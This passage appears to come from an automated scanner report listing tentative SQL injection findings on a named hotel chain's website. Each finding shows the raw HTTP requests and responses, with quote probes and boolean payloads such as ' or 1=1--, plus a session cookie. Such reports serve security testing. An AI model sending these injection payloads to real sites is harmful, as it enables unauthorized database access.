HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 03:23:29 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:23:29 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Food and Wine - Boutique Hotels
...[SNIP]...
1.6. http://www.redcarnationhotels.com/dining/seasonal-events [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /dining/seasonal-events

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /dining/seasonal-events' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/dining
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 03:22:46 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:22:46 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /dining/seasonal-events'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/dining
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 03:22:46 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:22:46 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Fine dining & hotel restaurants
...[SNIP]...
1.7. http://www.redcarnationhotels.com/dining/traditional-treats [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /dining/traditional-treats

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /dining/traditional-treats' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/dining
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 02:56:59 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:56:59 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /dining/traditional-treats'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/dining
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 02:57:00 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:57:00 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Fine dining & hotel restaurants
...[SNIP]...
1.8. http://www.redcarnationhotels.com/lloydstsb/terms [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /lloydstsb/terms

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /lloydstsb/terms' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 03:10:20 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:10:20 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /lloydstsb/terms'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 03:10:20 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:10:20 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>LLoyds TSB Premier</title>
<met
...[SNIP]...
1.9. http://www.redcarnationhotels.com/london-offers/terms-conditions [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /london-offers/terms-conditions

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /london-offers/terms-conditions' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/london-offers
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 03:09:10 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:09:10 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /london-offers/terms-conditions'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/london-offers
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 03:09:10 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:09:10 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury London Hotel Deals & Off
...[SNIP]...
1.10. http://www.redcarnationhotels.com/meet-the-team/terry-holmes [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /meet-the-team/terry-holmes

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 70152686'%20or%201%3d1--%20 and 70152686'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /meet-the-team/terry-holmes70152686'%20or%201%3d1--%20 HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://webcache.googleusercontent.com/search?q=cache:M_vK81JO5OUJ:www.milestonehotel.com/meet-the-team+%40rchmail.com&cd=6&hl=en&ct=clnk&gl=us
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:50:52 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:50:52 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Meet the Group Team - Luxury Hotels in London, Geneva, Cape Town & Miami - Red Carnation Hotels</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<meta name="verify-v1" content="eg7KnhE2StrHEIzTNOBAWuzPh2xMb8e3tTomNO5DIRw=" />
<meta name="robots" content="all,index,follow" />
<link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/static/css/print.css" type="text/css" media="handheld, print" />
<link rel="stylesheet" href="/static/datepicker/css/datepicker.css" type="text/css" media="screen" />
<link href="/static/images/favicon.ico" type="image/gif" rel="icon" />
<meta name="title" content="Meet the Group Team - Luxury Hotels in London, Geneva, Cape Town &amp; Miami - Red Carnation Hotels" />
<meta name="keywords" content="team members, key people, employees, hotel, hotels, best hotel luxury, luxury hotel, luxury hotel breaks, luxury hotel deals, luxury hotels, luxury hotels world, best luxury hotel, boutique hotel London, cape town hotel, 5 star hotels, 5 star luxury hotels, hotel reservation, leading hotels of the world, London hotel, London boutique hotel, hotels in Florida, hotels in Geneva, luxury boutique hotel, luxury cape town hotel, luxury country hotel, small luxury hotel" />
<meta name="description" content="Information about key people in the Red Carnation Hotels group. The hot
...[SNIP]...

Request 2

GET /meet-the-team/terry-holmes70152686'%20or%201%3d2--%20 HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://webcache.googleusercontent.com/search?q=cache:M_vK81JO5OUJ:www.milestonehotel.com/meet-the-team+%40rchmail.com&cd=6&hl=en&ct=clnk&gl=us
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 02:50:57 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:50:57 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Meet the Group Team - Luxury Hotels in London, Geneva, Cape Town & Miami - Red Carnation Hotels</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<meta name="verify-v1" content="eg7KnhE2StrHEIzTNOBAWuzPh2xMb8e3tTomNO5DIRw=" />
<meta name="robots" content="all,index,follow" />
<link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/static/css/print.css" type="text/css" media="handheld, print" />
<link rel="stylesheet" href="/static/datepicker/css/datepicker.css" type="text/css" media="screen" />
<link href="/static/images/favicon.ico" type="image/gif" rel="icon" />
<meta name="title" content="Meet the Group Team - Luxury Hotels in London, Geneva, Cape Town &amp; Miami - Red Carnation Hotels" />
<meta name="keywords" content="team members, key people, employees, hotel, hotels, best hotel luxury, luxury hotel, luxury hotel breaks, luxury hotel deals, luxury hotels, luxury hotels world, best luxury hotel, boutique hotel London, cape town hotel, 5 star hotels, 5 star luxury hotels, hotel reservation, leading hotels of the world, London hotel, London boutique hotel, hotels in Florida, hotels in Geneva, luxury boutique hotel, luxury cape town hotel, luxury country hotel, small luxury hotel" />
<meta name="description" content="Information about key people in the Red C
...[SNIP]...
1.11. http://www.redcarnationhotels.com/meet-the-team/terry-holmes/career [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /meet-the-team/terry-holmes/career

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 20314366'%20or%201%3d1--%20 and 20314366'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /meet-the-team/terry-holmes20314366'%20or%201%3d1--%20/career HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/meet-the-team/terry-holmes
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:54:48 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:54:48 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Meet the Group Team - Luxury Hotels in London, Geneva, Cape Town & Miami - Red Carnation Hotels</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<meta name="verify-v1" content="eg7KnhE2StrHEIzTNOBAWuzPh2xMb8e3tTomNO5DIRw=" />
<meta name="robots" content="all,index,follow" />
<link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/static/css/print.css" type="text/css" media="handheld, print" />
<link rel="stylesheet" href="/static/datepicker/css/datepicker.css" type="text/css" media="screen" />
<link href="/static/images/favicon.ico" type="image/gif" rel="icon" />
<meta name="title" content="Meet the Group Team - Luxury Hotels in London, Geneva, Cape Town &amp; Miami - Red Carnation Hotels" />
<meta name="keywords" content="team members, key people, employees, hotel, hotels, best hotel luxury, luxury hotel, luxury hotel breaks, luxury hotel deals, luxury hotels, luxury hotels world, best luxury hotel, boutique hotel London, cape town hotel, 5 star hotels, 5 star luxury hotels, hotel reservation, leading hotels of the world, London hotel, London boutique hotel, hotels in Florida, hotels in Geneva, luxury boutique hotel, luxury cape town hotel, luxury country hotel, small luxury hotel" />
<meta name="description" content="Information about key people in the Red Carnation Hotels group. The hot
...[SNIP]...

Request 2

GET /meet-the-team/terry-holmes20314366'%20or%201%3d2--%20/career HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/meet-the-team/terry-holmes
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 02:54:50 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:54:50 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Meet the Group Team - Luxury Hotels in London, Geneva, Cape Town & Miami - Red Carnation Hotels</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<meta name="verify-v1" content="eg7KnhE2StrHEIzTNOBAWuzPh2xMb8e3tTomNO5DIRw=" />
<meta name="robots" content="all,index,follow" />
<link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/static/css/print.css" type="text/css" media="handheld, print" />
<link rel="stylesheet" href="/static/datepicker/css/datepicker.css" type="text/css" media="screen" />
<link href="/static/images/favicon.ico" type="image/gif" rel="icon" />
<meta name="title" content="Meet the Group Team - Luxury Hotels in London, Geneva, Cape Town &amp; Miami - Red Carnation Hotels" />
<meta name="keywords" content="team members, key people, employees, hotel, hotels, best hotel luxury, luxury hotel, luxury hotel breaks, luxury hotel deals, luxury hotels, luxury hotels world, best luxury hotel, boutique hotel London, cape town hotel, 5 star hotels, 5 star luxury hotels, hotel reservation, leading hotels of the world, London hotel, London boutique hotel, hotels in Florida, hotels in Geneva, luxury boutique hotel, luxury cape town hotel, luxury country hotel, small luxury hotel" />
<meta name="description" content="Information about key people in the Red C
...[SNIP]...
1.12. http://www.redcarnationhotels.com/meet-the-team/terry-holmes/career [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /meet-the-team/terry-holmes/career

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /meet-the-team/terry-holmes/career' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/meet-the-team/terry-holmes
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 03:15:22 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:15:22 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /meet-the-team/terry-holmes/career'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/meet-the-team/terry-holmes
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 03:15:23 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:15:23 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Terry Holmes, Executive Directo
...[SNIP]...
1.13. http://www.redcarnationhotels.com/meetings-and-events/executive-club [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /meetings-and-events/executive-club

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /meetings-and-events/executive-club' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 03:17:54 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:17:54 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /meetings-and-events/executive-club'' HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 12 Oct 2010 03:17:54 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:17:54 GMT
Cache-Control: private, no-store
Status: 404 Not Found
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Business Hotels, Meeting
...[SNIP]...
1.14. http://www.redcarnationhotels.com/meetings-and-events/executive-club/apply [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.redcarnationhotels.com
Path:   /meetings-and-events/executive-club/apply

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /meetings-and-events/executive-club'/apply HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 12 Oct 2010 03:30:14 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:30:14 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /meetings-and-events/executive-club''/apply HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
